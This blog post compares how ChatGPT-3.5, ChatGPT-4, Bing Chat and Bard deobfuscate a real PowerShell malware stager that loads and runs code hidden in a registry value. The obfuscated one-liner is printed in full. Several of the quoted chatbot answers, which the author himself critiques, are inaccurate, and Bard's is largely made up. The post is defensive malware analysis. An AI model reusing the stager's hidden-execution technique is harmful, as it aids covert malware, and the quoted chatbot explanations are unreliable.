Malware Analysis: GPT3.5 vs 4 vs Bing Chat vs Bard

I’ll just ignore the fact that this is my first post in 1683 days, because I can.

Today we are going to have a look at how ChatGPT revolutionized the way we perform static malware analysis, specifically obfuscated code analysis, AND I will be comparing the output of 4 of the top currently available AI tools: ChatGPT-3.5, ChatGPT-4, Bing Chat GPT-4 and Google Bard.

Over the last couple of days, one of my sandbox machines got infected with a new PowerShell-based CryptoStealer (Yay me 🎉 little do they know that I’m currently crypto-broke). It runs in 3 phases: a stager, which runs a second stager-like script, which in turn communicates with a C2 server over DNS to run the actual malware in memory.

We will use the first PowerShell stager as today’s example: an obfuscated PS one-liner that executes another script hidden in the registry. File contents below:

$JEzTkjdyrhDpDt=[ScriptBlock]; icm ($JEzTkjdyrhDpDt::Create([string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))))
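
For reference, the path trick in this one-liner is plain string reversal: `[regex]::Matches(..., '.', 'RightToLeft')` walks the string from its end, one character per match, and `-join ''` glues the matches back together. Here is a minimal sketch of that single step in Python (picked so that nothing touches a real registry; the variable names are mine, not the malware's):

```python
# Reversed registry path literal, copied from the stager one-liner.
obfuscated = r'kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH'

# Matching '.' right-to-left and joining the matches is equivalent
# to reversing the string character by character.
registry_path = obfuscated[::-1]

print(registry_path)  # HKLM:\SOFTWARE\Martin PrikrylPeZSBdbvk
```

So `gp` (an alias for `Get-ItemProperty`) reads the `Ge1WvZfVx` value from that key, and whatever it holds is what gets executed.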

Depending on your PowerShell skills, it might take you anywhere from a couple of minutes to half an hour to manually de-obfuscate this code. But this ain’t the 2010s anymore: we have AI on our side now, so let’s use our new slaves to reduce this time to mere seconds.

I used the following prompt, followed by the stager code:

Rewrite the following obfuscated PowerShell script in a way that is easy to understand then explain what does it do, and, in summary, its main goal:

PS: I didn’t run any follow-up prompts to try to get better results; the displayed output is based solely on the initial prompt.

Let’s check the results of each of the 4 tools:

ChatGPT-3.5

The PowerShell script you provided executes a single line of code that is heavily obfuscated, making it difficult to understand what it does.
Here is a simplified version of the script that is easier to read and understand:
$code = [string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))
$block = [ScriptBlock]::Create($code)
Invoke-Command $block
This code creates a ScriptBlock object from an obfuscated string of code, then executes it using the Invoke-Command cmdlet. The main goal of this script is to execute the code contained in the obfuscated string. However, without knowing what the obfuscated code does, it's difficult to determine the purpose of the script as a whole.

Comments on ChatGPT-3.5

You call that de-obfuscated code??? It just split the one-liner into three statements and left the reversed string untouched. My 4-year-old daughter can do better. Thanks for nothing.

The goal description is also pretty useless, shame…

ChatGPT-4

The obfuscated PowerShell script can be rewritten in a more understandable way as follows:
$ScriptBlock = [ScriptBlock]
$ReversedString = 'kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH'
$Matches = [regex]::Matches($ReversedString, '.', 'RightToLeft') | ForEach {$_.value}
$JoinedMatches = -join $Matches
$Property = (gp $JoinedMatches).'Ge1WvZfVx'
$DecodedChars = $Property | % { [char]$_ }
$DecodedString = -join $DecodedChars
Invoke-Command -ScriptBlock $ScriptBlock::Create($DecodedString)
The script does the following:

1. Creates an empty ScriptBlock called $ScriptBlock.
2. Uses regex to reverse the string 'kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH', which results in 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'.
3. Creates a new script block using the newly obtained string as a path and appending 'Ge1WvZfVx' to the end of the path, creating 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ge1WvZfVx'.
4. Invokes the newly created script block using Invoke-Command.

In summary, the main goal of the script is to execute a hidden PowerShell script stored in the registry under the path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ge1WvZfVx'. The obfuscation is likely done to avoid detection by antivirus or other security measures, which is a common technique used in malicious scripts.

Comments on ChatGPT-4

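While the reversed registry key path is not accurate (the string actually reverses to 'HKLM:\SOFTWARE\Martin PrikrylPeZSBdbvk', and 'Ge1WvZfVx' is a value inside that key rather than part of the path), it rewrote the code in separate steps, which made it much easier to understand, and then explained it!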

It also provided a very useful goal description: clear, easy to understand and accurate about what the stager is for. It even used the word “hidden”, how cool is that!!
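
One step that ChatGPT-4's explanation glosses over is the final decode: the `Ge1WvZfVx` value is piped through `[char]$_`, which suggests it holds a list of numeric character codes that are turned into characters and joined into the script text. A rough sketch of that step in Python follows. The sample codes are made up for illustration (the real value data is not shown in this post), and `decode_char_codes` is a hypothetical helper name:

```python
def decode_char_codes(codes):
    """Mimic `$codes | % { [char]$_ }` followed by a join into one string."""
    return ''.join(chr(code) for code in codes)

# Hypothetical stand-in for the registry value data, NOT the real payload.
sample_codes = [87, 114, 105, 116, 101, 45, 72, 111, 115, 116,
                32, 39, 104, 105, 39]

print(decode_char_codes(sample_codes))  # Write-Host 'hi'
```

Decoding the value like this, instead of letting `icm` run it, gives you the second stage as plain text that you can read safely.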

Bing Chat GPT-4

The PowerShell script you provided is obfuscated. Obfuscation is the practice of making code difficult to understand or read. It is often used to protect intellectual property or to hide malicious code.

The script appears to be using the Invoke-Command cmdlet (icm) to execute a script block (`$JEzTkjdyrhDpDt::Create([string]::Join(‘’, ((gp (([regex]::Matches(‘kvbdBSZePlyrkirP nitraM\ERAWTFOS:MLKH’,‘.’,‘RightToLeft’) | ForEach {$.value}) -join ‘’)).‘Ge1WvZfVx’ | % { [char]$ })))).

The script block is stored in the variable $JEzTkjdyrhDpDt. The script block appears to be created by calling the Create method on the $JEzTkjdyrhDpDt object. The Create method appears to be taking a string as input. The string is created by joining together the results of several commands.

Unfortunately, without more context it is difficult to determine what the script block does or what its main goal is. If you can provide more information about where this script came from or what it is supposed to do, I may be able to help you better.

Comments on Bing Chat

It didn’t even bother to try to write a de-obfuscated version of the code. We got a nimrod over here…

It also tried (poorly) to explain the obvious at the code level, and got nowhere near a high-level description of the goal.

Google Bard

Sure, I can help you with that. Here is the rewritten PowerShell script:
$JEzTkjdyrhDpDt = [ScriptBlock]::Create('
$args = @()
foreach ($arg in $args) {
iex $arg
}
')

icm $JEzTkjdyrhDpDt::Create([string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))))
This script is a simple malware that runs a command on the system. It first creates a new script block, which is a type of PowerShell object that can be used to execute code. The script block contains a simple loop that executes the commands that are passed to it. The script then uses the Get-Process cmdlet to get a list of all the processes that are running on the system. It then uses the Regex cmdlet to find all of the processes that match a certain pattern. The pattern that it is looking for is kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH. This pattern is actually a string that has been reversed. When the string is reversed, it becomes HELLO WORLD. The script then uses the ForEach-Object cmdlet to iterate over the list of processes that match the pattern. For each process, it uses the iex cmdlet to execute the command that is associated with the process.

The main goal of this script is to run a command on the system. The command that it runs is determined by the string that is passed to it. The string that is passed to it is actually a reversed string that contains the command that the script should run.

Comments on Bard

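Bard did try to de-obfuscate the code, but did it so poorly that the result is useless.

But it DID identify it as malware, so kudos for that. It also got the main goal right (executing a command on the system), although it got choked up on the technicalities: gp is an alias for Get-ItemProperty, not Get-Process, and the reversed string is definitely not HELLO WORLD.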

Verdict

This is an easy one: Chapeau bas to the OG, ChatGPT-4 is just on another level!
Of course the others COULD perform better with follow-up prompts, but ChatGPT-4 did not require any 🤩

What do you think? Have you tried any more powerful tools for this type of analysis?